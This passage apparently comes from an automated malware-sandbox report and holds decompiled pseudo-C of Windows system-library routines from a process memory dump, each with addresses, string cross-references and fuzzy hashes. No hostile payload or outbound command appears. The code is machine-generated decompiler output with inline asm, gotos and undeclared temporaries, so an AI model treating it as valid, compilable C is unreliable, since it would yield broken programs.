            E01145720();
            _t104 = _v28;
            _t116 = _t116 + 0xc;
            continue;
        }
    }
}

                                                                            0x00000000
                                                                            0x010b2e05
                                                                            0x010b2e0c
                                                                            0x0110f9d9
                                                                            0x010b2e12
                                                                            0x010b2e12
                                                                            0x010b2e12
                                                                            0x010b2e1a
                                                                            0x0110f9e3
                                                                            0x0110f9e9
                                                                            0x0110f9f0
                                                                            0x0110f9f6
                                                                            0x0110f9f8
                                                                            0x0110f9f8
                                                                            0x0110f9f0
                                                                            0x010b2e23
                                                                            0x0110fa02
                                                                            0x0110fa03
                                                                            0x0110fa05
                                                                            0x0110fa06
                                                                            0x00000000
                                                                            0x010b2e29
                                                                            0x010b2e29
                                                                            0x010b2e2e
                                                                            0x010b2e34
                                                                            0x010b2e3e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010b2e44
                                                                            0x010b2e47
                                                                            0x010b2e4d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010b2e4f
                                                                            0x010b2e54
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010b2e5a
                                                                            0x010b2e5f
                                                                            0x010b2e9a
                                                                            0x010b2ea4
                                                                            0x010b2ea5
                                                                            0x010b2ea8
                                                                            0x010b2eaf
                                                                            0x010b2eb2
                                                                            0x010b2eb5
                                                                            0x0110fae9
                                                                            0x0110faeb
                                                                            0x0110faed
                                                                            0x0110faef
                                                                            0x0110faf7
                                                                            0x0110faf8
                                                                            0x0110fafd
                                                                            0x0110faff
                                                                            0x0110fb04
                                                                            0x0110fb04
                                                                            0x0110faff
                                                                            0x010b2ec0
                                                                            0x010b2ec4
                                                                            0x010b2ec6
                                                                            0x010b2ec8
                                                                            0x0110fb14
                                                                            0x0110fb18
                                                                            0x0110fb1e
                                                                            0x0110fb21
                                                                            0x0110fb21
                                                                            0x010b2ece
                                                                            0x010b2ece
                                                                            0x010b2ece
                                                                            0x010b2ed7
                                                                            0x010b2e61
                                                                            0x010b2e63
                                                                            0x0110fa6b
                                                                            0x0110fa71
                                                                            0x0110fa76
                                                                            0x0110fa78
                                                                            0x0110fa8a
                                                                            0x0110fa7a
                                                                            0x0110fa83
                                                                            0x0110fa83
                                                                            0x0110fa8f
                                                                            0x0110fa91
                                                                            0x0110fa97
                                                                            0x0110fa9d
                                                                            0x0110faa4
                                                                            0x0110faaa
                                                                            0x0110faaf
                                                                            0x0110fab1
                                                                            0x0110fac3
                                                                            0x0110fab3
                                                                            0x0110fabc
                                                                            0x0110fabc
                                                                            0x0110fac8
                                                                            0x0110facb
                                                                            0x0110fadf
                                                                            0x0110fadf
                                                                            0x0110facb
                                                                            0x0110faa4
                                                                            0x0110fa91
                                                                            0x010b2e6f
                                                                            0x010b2e6f
                                                                            0x010b2e5f
                                                                            0x0110fa13
                                                                            0x0110fa15
                                                                            0x0110fa17
                                                                            0x0110fa1f
                                                                            0x0110fa21
                                                                            0x0110fa22
                                                                            0x0110fa25
                                                                            0x0110fa28
                                                                            0x0110fa2f
                                                                            0x0110fa2f
                                                                            0x0110fa2a
                                                                            0x0110fa2a
                                                                            0x0110fa2a
                                                                            0x0110fa31
                                                                            0x0110fa34
                                                                            0x0110fa36
                                                                            0x0110fa3c
                                                                            0x0110fa3e
                                                                            0x0110fa41
                                                                            0x0110fa43
                                                                            0x0110fa45
                                                                            0x0110fa45
                                                                            0x0110fa41
                                                                            0x0110fa3c
                                                                            0x0110fa4a
                                                                            0x0110fa4f
                                                                            0x0110fa51
                                                                            0x0110fa53
                                                                            0x0110fa56
                                                                            0x0110fa5b
                                                                            0x0110fa5e
                                                                            0x00000000
                                                                            0x0110fa5e
                                                                            0x010b2e23

                                                                            Strings
                                                                            • RTL: Re-Waiting , xrefs: 0110FA4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Re-Waiting
                                                                            • API String ID: 0-316354757
                                                                            • Opcode ID: 91e0a7d999389ce07d665d196c006180212f3d195ae174566499bd9df1d352cb
                                                                            • Instruction ID: 35206f6f57e40f0af8b4faca13b607bd63b44c84a7dc101e8f59fc916d290602
                                                                            • Opcode Fuzzy Hash: 91e0a7d999389ce07d665d196c006180212f3d195ae174566499bd9df1d352cb
                                                                            • Instruction Fuzzy Hash: 11613531E00606DFDB3BDF6CC881BBE7BE5EB44714F1442A9E5A1972C1D7B4A9828781
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
E010B52A5(char __ecx) {
    char _v20;
    char _v28;
    char _v29;
    void* _v32;
    void* _v36;
    void* _v37;
    void* _v38;
    void* _v40;
    void* _v46;
    void* _v64;
    void* __ebx;
    intOrPtr* _t49;
    signed int _t53;
    short _t85;
    signed int _t87;
    signed int _t88;
    signed int _t89;
    intOrPtr _t101;
    intOrPtr* _t102;
    intOrPtr* _t104;
    signed int _t106;
    void* _t108;

    _t93 = __ecx;
    _t108 = (_t106 & 0xfffffff8) - 0x1c;
    _push(_t88);
    _v29 = __ecx;
    _t89 = _t88 | 0xffffffff;
    while(1) {
        E010CEEF0(0x11a79a0);
        _t104 =  *0x11a8210; // 0x5e2d68
        if(_t104 == 0) {
            break;
        }
        asm("lock inc dword [esi]");
        *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
        E010CEB70(_t93, 0x11a79a0);
        if( *((char*)(_t108 + 0xf)) != 0) {
            _t101 =  *0x7ffe02dc;
            __eflags =  *(_t104 + 0x14) & 0x00000001;
            if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                L9:
                _push(0);
                _push(0);
                _push(0);
                _push(0);
                _push(0x90028);
                _push(_t108 + 0x20);
                _push(0);
                _push(0);
                _push(0);
                _push( *((intOrPtr*)(_t104 + 4)));
                _t53 = E010F9890();
                __eflags = _t53;
                if(_t53 >= 0) {
                    __eflags =  *(_t104 + 0x14) & 0x00000001;
                    if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                        E010CEEF0(0x11a79a0);
                        *((intOrPtr*)(_t104 + 8)) = _t101;
                        E010CEB70(0, 0x11a79a0);
                    }
                    goto L3;
                }
                __eflags = _t53 - 0xc0000012;
                if(__eflags == 0) {
                    L12:
                    _t13 = _t104 + 0xc; // 0x5e2d75
                    _t93 = _t13;
                    *((char*)(_t108 + 0x12)) = 0;
                    __eflags = E010EF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                    if(__eflags >= 0) {
                        L15:
                        _t102 = _v28;
                        *_t102 = 2;
                        *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        E010CEEF0(0x11a79a0);
                        __eflags =  *0x11a8210 - _t104; // 0x5e2d68
                        if(__eflags == 0) {
                            __eflags =  *((char*)(_t108 + 0xe));
                            _t95 =  *((intOrPtr*)(_t108 + 0x14));
                            *0x11a8210 = _t102;
                            _t32 = _t102 + 0xc; // 0x0
                            *_t95 =  *_t32;
                            _t33 = _t102 + 0x10; // 0x0
                            *((intOrPtr*)(_t95 + 4)) =  *_t33;
                            _t35 = _t102 + 4; // 0xffffffff
                            *((intOrPtr*)(_t95 + 8)) =  *_t35;
                            if(__eflags != 0) {
                                _t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                E01134888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                            }
                            E010CEB70(_t95, 0x11a79a0);
                            asm("lock xadd [esi], eax");
                            if(__eflags == 0) {
                                _push( *((intOrPtr*)(_t104 + 4)));
                                E010F95D0();
                                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                _t102 =  *((intOrPtr*)(_t108 + 0x10));
                            }
                            asm("lock xadd [esi], ebx");
                            __eflags = _t89 == 1;
                            if(_t89 == 1) {
                                _push( *((intOrPtr*)(_t104 + 4)));
                                E010F95D0();
                                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                _t102 =  *((intOrPtr*)(_t108 + 0x10));
                            }
                            _t49 = _t102;
                            L4:
                            return _t49;
                        }
                        E010CEB70(_t93, 0x11a79a0);
                        asm("lock xadd [esi], eax");
                        if(__eflags == 0) {
                            _push( *((intOrPtr*)(_t104 + 4)));
                            E010F95D0();
                            L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            _t102 =  *((intOrPtr*)(_t108 + 0x10));
                        }
                        *_t102 = 1;
                        asm("lock xadd [edi], eax");
                        if(__eflags == 0) {
                            _t28 = _t102 + 4; // 0xffffffff
                            _push( *_t28);
                            E010F95D0();
                            L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                        }
                        continue;
                    }
                    _t93 =  &_v20;
                    *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                    _t85 = 6;
                    _v20 = _t85;
                    _t87 = E010EF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                    __eflags = _t87;
                    if(_t87 < 0) {
                        goto L3;
                    }
                    *((char*)(_t108 + 0xe)) = 1;
                    goto L15;
                }
                __eflags = _t53 - 0xc000026e;
                if(__eflags != 0) {
                    goto L3;
                }
                goto L12;
            }
            __eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
            if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                goto L3;
            } else {
                goto L9;
            }
        }
        L3:
        _t49 = _t104;
        goto L4;
    }
    _t49 = 0;
    goto L4;
}


                                                                            Strings
                                                                            • h-^ , xrefs: 010B52C4, 01110E70, 01110EE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: h-^
                                                                            • API String ID: 0-360474006
                                                                            • Opcode ID: d87b73193044a0d52b8cae945ce7b41689c606491c89e3365e3f254c433bc797
                                                                            • Instruction ID: 844446dc5889652371e5b0d228e7b24751aa1a42de310091228940923e4e3118
                                                                            • Opcode Fuzzy Hash: d87b73193044a0d52b8cae945ce7b41689c606491c89e3365e3f254c433bc797
                                                                            • Instruction Fuzzy Hash: 1C51BB301063429FD725EF68C842BABBBE4BF54B14F14096EF5D587651E770E844CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                                                                                  E01180EA5(void* __ecx, void* __edx) { 				signed int _v20; 				char _v24; 				intOrPtr _v28; 				unsigned int _v32; 				signed int _v36; 				intOrPtr _v40; 				char _v44; 				intOrPtr _v64; 				void* __ebx; 				void* __edi; 				signed int _t58; 				unsigned int _t60; 				intOrPtr _t62; 				char* _t67; 				char* _t69; 				void* _t80; 				void* _t83; 				intOrPtr _t93; 				intOrPtr _t115; 				char _t117; 				void* _t120;  				_t83 = __edx; 				_t117 = 0; 				_t120 = __ecx; 				_v44 = 0; 				if(E0117FF69(__ecx,  &_v44,  &_v32) < 0) { 					L24: 					_t109 = _v44; 					if(_v44 != 0) { 						E01181074(_t83, _t120, _t109, _t117, _t117); 					} 					L26: 					return _t117; 				} 				_t93 =  *((intOrPtr*)(__ecx + 0x3c)); 				_t5 = _t83 + 1; // 0x1 				_v36 = _t5 << 0xc; 				_v40 = _t93; 				_t58 =  *(_t93 + 0xc) & 0x40000000; 				asm("sbb ebx, ebx"); 				_t83 = ( ~_t58 & 0x0000003c) + 4; 				if(_t58 != 0) { 					_push(0); 					_push(0x14); 					_push( &_v24); 					_push(3); 					_push(_t93); 					_push(0xffffffff); 					_t80 = E010F9730(); 					_t115 = _v64; 					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) { 						_push(_t93); 						E0117A80D(_t115, 1, _v20, _t117); 						_t83 = 4; 					} 				} 				if(E0117A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) { 					goto L24; 				} 				_t60 = _v32; 				_t97 = (_t60 != 0x100000) + 1; 				_t83 = (_v44 -  *0x11a8b04 >> 0x14) + (_v44 -  *0x11a8b04 >> 0x14); 				_v28 = (_t60 != 0x100000) + 1; 				_t62 = _t83 + (_t60 >> 0x14) * 2; 				_v40 = _t62; 				if(_t83 >= _t62) { 					L10: 					asm("lock xadd [eax], ecx"); 					asm("lock xadd [eax], ecx"); 					if(E010D7D50() == 0) { 						_t67 = 0x7ffe0380; 					} else { 						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226; 					} 					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) 
& 0x00000001) != 0) { 						E0117138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc); 					} 					if(E010D7D50() == 0) { 						_t69 = 0x7ffe0388; 					} else { 						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; 					} 					if( *_t69 != 0) { 						E0116FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32); 					} 					if(( *0x11a8724 & 0x00000008) != 0) { 						E011752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28))); 					} 					_t117 = _v44; 					goto L26; 				} 				while(E011815B5(0x11a8ae4, _t83, _t97, _t97) >= 0) { 					_t97 = _v28; 					_t83 = _t83 + 2; 					if(_t83 < _v40) { 						continue; 					} 					goto L10; 				} 				goto L24; 			}                        


                                                                            Strings
                                                                            • ` , xrefs: 01180F16
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-2679148245
                                                                            • Opcode ID: 3f84ab6b4bce470927556d3bb020aa7f73cad7fc8e8cfc58a67fbc4102ba62ce
                                                                            • Instruction ID: 08d02a3b178210e44e769618cdb8ade1853aa9256f6e1fe1c053ecda90832b8f
                                                                            • Opcode Fuzzy Hash: 3f84ab6b4bce470927556d3bb020aa7f73cad7fc8e8cfc58a67fbc4102ba62ce
                                                                            • Instruction Fuzzy Hash: 955190713043429FD329EF28D880B5BBBE5EBC4714F14892CF69697290D771E806CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                                                                                  E010EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) { 				intOrPtr _v8; 				intOrPtr _v12; 				intOrPtr _v16; 				char* _v20; 				intOrPtr _v24; 				char _v28; 				intOrPtr _v32; 				char _v36; 				char _v44; 				char _v52; 				intOrPtr _v56; 				char _v60; 				intOrPtr _v72; 				void* _t51; 				void* _t58; 				signed short _t82; 				short _t84; 				signed int _t91; 				signed int _t100; 				signed short* _t103; 				void* _t108; 				intOrPtr* _t109;  				_t103 = __ecx; 				_t82 = __edx; 				_t51 = E010D4120(0, __ecx, 0,  &_v52, 0, 0, 0); 				if(_t51 >= 0) { 					_push(0x21); 					_push(3); 					_v56 =  *0x7ffe02dc; 					_v20 =  &_v52; 					_push( &_v44); 					_v28 = 0x18; 					_push( &_v28); 					_push(0x100020); 					_v24 = 0; 					_push( &_v60); 					_v16 = 0x40; 					_v12 = 0; 					_v8 = 0; 					_t58 = E010F9830(); 					_t87 =  *[fs:0x30]; 					_t108 = _t58; 					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72); 					if(_t108 < 0) { 						L11: 						_t51 = _t108; 					} else { 						_push(4); 						_push(8); 						_push( &_v36); 						_push( &_v44); 						_push(_v60); 						_t108 = E010F9990(); 						if(_t108 < 0) { 							L10: 							_push(_v60); 							E010F95D0(); 							goto L11; 						} else { 							_t109 = L010D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18); 							if(_t109 == 0) { 								_t108 = 0xc0000017; 								goto L10; 							} else { 								_t21 = _t109 + 0x18; // 0x18 								 *((intOrPtr*)(_t109 + 4)) = _v60; 								 *_t109 = 1; 								 *((intOrPtr*)(_t109 + 0x10)) = _t21; 								 *(_t109 + 0xe) = _t82; 								 *((intOrPtr*)(_t109 + 8)) = _v56; 								 *((intOrPtr*)(_t109 + 0x14)) = _v32; 								E010FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff); 								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0; 								 
*((short*)(_t109 + 0xc)) =  *_t103; 								_t91 =  *_t103 & 0x0000ffff; 								_t100 = _t91 & 0xfffffffe; 								_t84 = 0x5c; 								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) { 									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) { 										_push(_v60); 										E010F95D0(); 										L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109); 										_t51 = 0xc0000106; 									} else { 										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84; 										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0; 										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2; 										goto L5; 									} 								} else { 									L5: 									 *_a4 = _t109; 									_t51 = 0; 								} 							} 						} 					} 				} 				return _t51; 			}                        


                                                                            Strings
                                                                            • @ , xrefs: 010EF124
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                            • Instruction ID: 2f4021fbefd29dc453461c440dfb24d811b1f9ce3c372c053b104794496b5b4d
                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                            • Instruction Fuzzy Hash: C1518D726047119FC320DF29C841AABBBF8FF58710F00892EFA9587690E7B4E914CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                                                                                  E01133540(intOrPtr _a4) { 				signed int _v12; 				intOrPtr _v88; 				intOrPtr _v92; 				char _v96; 				char _v352; 				char _v1072; 				intOrPtr _v1140; 				intOrPtr _v1148; 				char _v1152; 				char _v1156; 				char _v1160; 				char _v1164; 				char _v1168; 				char* _v1172; 				short _v1174; 				char _v1176; 				char _v1180; 				char _v1192; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* __ebp; 				short _t41; 				short _t42; 				intOrPtr _t80; 				intOrPtr _t81; 				signed int _t82; 				void* _t83;  				_v12 =  *0x11ad360 ^ _t82; 				_t41 = 0x14; 				_v1176 = _t41; 				_t42 = 0x16; 				_v1174 = _t42; 				_v1164 = 0x100; 				_v1172 = L"BinaryHash"; 				_t81 = E010F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192); 				if(_t81 < 0) { 					L11: 					_t75 = _t81; 					E01133706(0, _t81, _t79, _t80); 					L12: 					if(_a4 != 0xc000047f) { 						E010FFA60( &_v1152, 0, 0x50); 						_v1152 = 0x60c201e; 						_v1148 = 1; 						_v1140 = E01133540; 						E010FFA60( &_v1072, 0, 0x2cc); 						_push( &_v1072); 						E0110DDD0( &_v1072, _t75, _t79, _t80, _t81); 						E01140C30(0, _t75, _t80,  &_v1152,  &_v1072, 2); 						_push(_v1152); 						_push(0xffffffff); 						E010F97C0(); 					} 					return E010FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81); 				} 				_t79 =  &_v352; 				_t81 = E01133971(0, _a4,  &_v352,  &_v1156); 				if(_t81 < 0) { 					goto L11; 				} 				_t75 = _v1156; 				_t79 =  &_v1160; 				_t81 = E01133884(_v1156,  &_v1160,  &_v1168); 				if(_t81 >= 0) { 					_t80 = _v1160; 					E010FFA60( &_v96, 0, 0x50); 					_t83 = _t83 + 0xc; 					_push( &_v1180); 					_push(0x50); 					_push( &_v96); 					_push(2); 					_push( &_v1176); 					_push(_v1156); 					_t81 = E010F9650(); 					if(_t81 >= 0) { 						if(_v92 != 3 || _v88 == 0) { 							_t81 = 0xc000090b; 						} 						if(_t81 >= 0) { 							_t75 = _a4; 							_t79 
=  &_v352; 							E01133787(_a4,  &_v352, _t80); 						} 					} 					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168); 				} 				_push(_v1156); 				E010F95D0(); 				if(_t81 >= 0) { 					goto L12; 				} else { 					goto L11; 				} 			}                        

                                                                            0x00000000

                                                                            Strings
                                                                            • BinaryHash , xrefs: 0113358F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryHash
                                                                            • API String ID: 0-2202222882
                                                                            • Opcode ID: 8b551dea72c832c1e467c010bfd0859d767d9a2c550d183377f70b8cd477e051
                                                                            • Instruction ID: 750b2552a492c15d72081aa1ad34c1e3cc16ef2a4b771a7f491afc6e3ff51627
                                                                            • Opcode Fuzzy Hash: 8b551dea72c832c1e467c010bfd0859d767d9a2c550d183377f70b8cd477e051
                                                                            • Instruction Fuzzy Hash: 204132F2D1052D9FDB259A50CC81FDEB77CAB44718F0045A9EB19AB240DB309F888F98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
E011805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
    signed int _v20;
    char _v24;
    signed int _v28;
    char _v32;
    signed int _v36;
    intOrPtr _v40;
    void* __ebx;
    void* _t35;
    signed int _t42;
    char* _t48;
    signed int _t59;
    signed char _t61;
    signed int* _t79;
    void* _t88;

    _v28 = __edx;
    _t79 = __ecx;
    if(E011807DF(__ecx, __edx, &_a4, &_a8, 0) == 0) {
        L13:
        _t35 = 0;
        L14:
        return _t35;
    }
    _t61 = __ecx[1];
    _t59 = __ecx[0xf];
    _v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
    _v36 = _a8 << 0xc;
    _t42 = *(_t59 + 0xc) & 0x40000000;
    asm("sbb esi, esi");
    _t88 = ( ~_t42 & 0x0000003c) + 4;
    if(_t42 != 0) {
        _push(0);
        _push(0x14);
        _push( &_v24);
        _push(3);
        _push(_t59);
        _push(0xffffffff);
        if(E010F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
            _push(_t61);
            E0117A80D(_t59, 1, _v20, 0);
            _t88 = 4;
        }
    }
    _t35 = E0117A854( &_v32, &_v36, 0, 0x1000, _t88, 0, *((intOrPtr*)(_t79 + 0x34)), *((intOrPtr*)(_t79 + 0x38)));
    if(_t35 < 0) {
        goto L14;
    }
    E01181293(_t79, _v40, E011807DF(_t79, _v28, &_a4, &_a8, 1));
    if(E010D7D50() == 0) {
        _t48 = 0x7ffe0380;
    } else {
        _t48 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
    }
    if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
        E0117138A(_t59, *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
    }
    goto L13;
}


                                                                            Strings
                                                                            • ` , xrefs: 01180633
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `
                                                                            • API String ID: 0-2679148245
                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                            • Instruction ID: 43321769f8e650023c748290e0d3931c33f5803490c92e98af51b6c93a1d91ea
                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                            • Instruction Fuzzy Hash: 5B3108322047096BE714EE18CC45F977BD9FBC8758F248125FA549B280D770E908CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E01133884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
    char _v8;
    intOrPtr _v12;
    intOrPtr* _v16;
    char* _v20;
    short _v22;
    char _v24;
    intOrPtr _t38;
    short _t40;
    short _t41;
    void* _t44;
    intOrPtr _t47;
    void* _t48;

    _v16 = __edx;
    _t40 = 0x14;
    _v24 = _t40;
    _t41 = 0x16;
    _v22 = _t41;
    _t38 = 0;
    _v12 = __ecx;
    _push( &_v8);
    _push(0);
    _push(0);
    _push(2);
    _t43 = &_v24;
    _v20 = L"BinaryName";
    _push( &_v24);
    _push(__ecx);
    _t47 = 0;
    _t48 = E010F9650();
    if(_t48 >= 0) {
        _t48 = 0xc000090b;
    }
    if(_t48 != 0xc0000023) {
        _t44 = 0;
        L13:
        if(_t48 < 0) {
            L16:
            if(_t47 != 0) {
                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
            }
            L18:
            return _t48;
        }
        *_v16 = _t38;
        *_a4 = _t47;
        goto L18;
    }
    _t47 = L010D4620(_t43, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
    if(_t47 != 0) {
        _push( &_v8);
        _push(_v8);
        _push(_t47);
        _push(2);
        _push( &_v24);
        _push(_v12);
        _t48 = E010F9650();
        if(_t48 < 0) {
            _t44 = 0;
            goto L16;
        }
        if( *((intOrPtr*)(_t47 + 4)) != 1 || *(_t47 + 8) < 4) {
            _t48 = 0xc000090b;
        }
        _t44 = 0;
        if(_t48 < 0) {
            goto L16;
        } else {
            _t17 = _t47 + 0xc; // 0xc
            _t38 = _t17;
            if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                _t48 = 0xc000090b;
            }
            goto L13;
        }
    }
    _t48 = _t48 + 0xfffffff4;
    goto L18;
}


                                                                            Strings
                                                                            • BinaryName , xrefs: 011338B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: BinaryName
                                                                            • API String ID: 0-215506332
                                                                            • Opcode ID: c90671ef5535efacb4aa7356924646b865ed831afb05b4c07c5897041db3f931
                                                                            • Instruction ID: b1e9cc8d969e1e230c5e945163a049c841180a83cc6ac5c6f0068c9018107c43
                                                                            • Opcode Fuzzy Hash: c90671ef5535efacb4aa7356924646b865ed831afb05b4c07c5897041db3f931
                                                                            • Instruction Fuzzy Hash: 3D310532D0050AEFEB19DA58C945EABFB74FB80720F024169E964A7294E7309E00C7A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 33%
E010ED294(void* __ecx, char __edx, void* __eflags) {
    signed int _v8;
    char _v52;
    signed int _v56;
    signed int _v60;
    intOrPtr _v64;
    char* _v68;
    intOrPtr _v72;
    char _v76;
    signed int _v84;
    intOrPtr _v88;
    char _v92;
    intOrPtr _v96;
    intOrPtr _v100;
    char _v104;
    char _v105;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t35;
    char _t38;
    signed int _t40;
    signed int _t44;
    signed int _t52;
    void* _t53;
    void* _t55;
    void* _t61;
    intOrPtr _t62;
    void* _t64;
    signed int _t65;
    signed int _t66;

    _t68 = (_t66 & 0xfffffff8) - 0x6c;
    _v8 = *0x11ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
    _v105 = __edx;
    _push( &_v92);
    _t52 = 0;
    _push(0);
    _push(0);
    _push( &_v104);
    _push(0);
    _t59 = __ecx;
    _t55 = 2;
    if(E010D4120(_t55, __ecx) < 0) {
        _t35 = 0;
        L8:
        _pop(_t61);
        _pop(_t64);
        _pop(_t53);
        return E010FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
    }
    _v96 = _v100;
    _t38 = _v92;
    if(_t38 != 0) {
        _v104 = _t38;
